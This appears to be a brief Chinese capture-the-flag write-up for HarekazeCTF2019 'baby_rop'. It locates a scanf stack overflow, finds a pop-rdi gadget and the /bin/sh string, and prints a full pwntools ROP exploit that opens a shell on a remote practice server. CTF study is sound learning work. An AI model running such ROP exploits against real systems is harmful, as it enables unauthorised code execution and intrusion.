[HarekazeCTF2019]baby_rop 1
1.checksec
2.ida
溢出点在 __isoc99_scanf(“%s”, v4);处。
shif+f12找到bin/sh
但只有bin/sh的字符串
要想触发后门函数必须要调用system函数,故找到call system的指令的地址
使用命令ROPgadget --binary pwn14 --only 'pop|ret’找到pop rdi指令的地址
故exp如下:
from pwn import*
p=remote('node4.buuoj.cn',26818)
payload=b'a'*24+p64(0x400683)+p64(0x601048)+p64(0x4005E3)
p.sendlineafter("What's your name? ",payload)
p.interactive()
但拿到控制权后不能直接cat flag
首先需要使用命令find -name flag找到flag所在文件的位置./home/babyrop/flag
然后cd ./home/babyrop,再cat flag